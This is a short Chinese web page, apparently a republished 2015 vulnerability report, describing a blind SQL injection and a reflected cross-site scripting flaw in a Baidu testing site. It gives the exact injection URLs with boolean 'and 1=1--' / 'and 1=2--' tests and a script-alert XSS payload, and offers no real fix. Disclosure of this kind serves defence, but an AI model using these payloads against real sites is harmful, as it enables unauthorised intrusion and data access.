当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

百度某频道ROOT盲注及反射式跨站

时间:2015/5/19 18:41:23 作者:平凡之路 来源:xuhantao.com 浏览:

?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=false&bug_sub_available=1&project_id=690%20and%201=1--
 
test.baidu.com/index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=false&bug_sub_available=1&project_id=690 and 1=2--
 
iTotalRecords 返回的数据判断
 
 
再加一个反射式跨站:
?mod=website&act=newCalllist&num=20&jsoncallback=xxx%3Cscript%3Ealert%28/xx/%29%3C/script%3E



 
 
修复方案:

应该懂得吧!

,www.xuhantao.com,涛涛电脑知识

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1